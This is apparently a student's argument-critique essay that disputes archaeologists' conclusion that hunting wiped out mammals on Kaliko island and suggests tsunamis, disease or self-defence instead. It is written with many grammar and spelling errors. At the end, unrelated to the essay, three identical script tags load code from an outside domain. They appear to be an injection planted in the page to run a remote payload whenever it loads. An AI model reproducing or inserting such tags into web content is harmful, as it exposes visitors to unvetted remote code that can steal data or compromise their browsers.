Based on the finding of the archaeologist the human has arrived 7000 years ago and the plethora of mammal species that existed on Kaliko island was extinct. As the archaeologist suggests that the cause of the extinct for mammals on that island could be extensive hunting as the remains of mammals and fishes were found out at the same place. The conclusion of the archaeologists was based on the remains of the mammals and fishes, I would like to undermine the conclusion as there can be other factors responsible for the extinction of those mammals.

The archaeologists have neglected the possibilities of natural disasters such as tsunami, as the islands are generally smaller in size and are surrounded by water bodies. Therefore, it is possible that the fishes can come onshore with the Tsumai and the flood can cause the extinction of mammals from the island. The natural disasters can result in the extinction of entire flora and fauna of the island.

Apart from the natural disaster, there can other causes such as plague can be the reason for the extinction of mammals in that era. The medication during that period was not as today, as may disease has been removed from the earth with the help of advanced medication and technology. The archaeologists have not mentioned anything as such in there survey, as the potential reason for there extinct.

The mammals are generally the most modest animal species on earth but its not true for all. Some mammals are extremely wild and can be a latent threat to civilization, the carnivorous animals can enter and exploit the entire village. Therefore it can possible that various mammals were killed in self-defence in order to protect the people of the island.

Therefore I would like to conclude that the facts should be looked at properly by the archaeologists other than giving their conclusion based on only weapons and remains of the animals found at the same place.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>